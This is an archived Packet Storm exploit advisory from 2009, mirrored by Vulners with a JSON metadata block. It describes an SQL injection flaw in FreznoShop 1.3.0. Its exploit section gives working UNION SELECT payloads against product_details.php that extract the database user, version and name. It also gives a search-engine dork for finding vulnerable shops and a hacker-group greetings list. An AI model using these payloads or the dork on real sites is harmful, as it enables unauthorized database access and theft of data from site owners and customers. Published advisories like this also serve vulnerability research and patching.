Search...

FreznoShop 1.3.0 SQL Injection

2009-04-14T00:00:00

ID PACKETSTORM:76603
Type packetstorm
Reporter NoGe
Modified 2009-04-14T00:00:00

Description

                                        
                                            `======================================================================================  
  
  
[o] FreznoShop 1.3.0 SQL Injection Vulnerability  
  
Software : FreznoShop version 1.3.0  
Vendor : http://sourceforge.net/projects/freznoshop/  
Download : http://sourceforge.net/project/platformdownload.php?group_id=86090  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
======================================================================================  
  
  
[o] Vulnerable file  
  
product_details.php  
  
  
  
[o] Exploit  
  
http://localhost/[path]/product_details.php?id=[SQL}  
product_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11--  
product_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11,12--  
  
  
  
[o] Dork  
  
"Powered by FreznoShop"  
  
  
======================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org ]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3  
H312Y yooogy mousekill }^-^{ loqsa  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
  
======================================================================================  
  
`

JSON Vulners Source

Initial Source

{"type": "packetstorm", "published": "2009-04-14T00:00:00", "reporter": "NoGe", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "419cdb66376643f0cf1e3886ed4c1563"}, {"key": "modified", "hash": "9e44ee2bd5f4f700494f3388ee134947"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "9e44ee2bd5f4f700494f3388ee134947"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "087f942d0830f2760d99ac99126dfb6b"}, {"key": "sourceData", "hash": "7f285c304abe59566a025dee6c2f5d25"}, {"key": "sourceHref", "hash": "c6e956ab1ad90694e2bb9d992cea8665"}, {"key": "title", "hash": "2efb245223675b06d1bfc787eb541581"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`====================================================================================== \n \n \n[o] FreznoShop 1.3.0 SQL Injection Vulnerability \n \nSoftware : FreznoShop version 1.3.0 \nVendor : http://sourceforge.net/projects/freznoshop/ \nDownload : http://sourceforge.net/project/platformdownload.php?group_id=86090 \nAuthor : NoGe \nContact : noge[dot]code[at]gmail[dot]com \nBlog : http://evilc0de.blogspot.com \n \n \n====================================================================================== \n \n \n[o] Vulnerable file \n \nproduct_details.php \n \n \n \n[o] Exploit \n \nhttp://localhost/[path]/product_details.php?id=[SQL} \nproduct_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11-- \nproduct_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11,12-- \n \n \n \n[o] Dork \n \n\"Powered by FreznoShop\" \n \n \n====================================================================================== \n \n \n[o] Greetz \n \nMainHack BrotherHood [ http://serverisdown.org ] \nVrs-hCk OoN_BoY Paman bL4Ck_3n91n3 \nH312Y yooogy mousekill }^-^{ loqsa \nskulmatic OLiBekaS ulga Cungkee k1tk4t str0ke \n \n \n====================================================================================== \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:22:15", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/76603/FreznoShop-1.3.0-SQL-Injection.html", "sourceHref": "https://packetstormsecurity.com/files/download/76603/freznoshop-sql.txt", "title": "FreznoShop 1.3.0 SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:15"}, "vulnersScore": 7.5}, "references": [], "id": "PACKETSTORM:76603", "hash": "e791c9bce53d625df457647d10c76d1cdcd8c72553a7f566881347192ec22bf5", "edition": 1, "cvelist": [], "modified": "2009-04-14T00:00:00", "description": ""}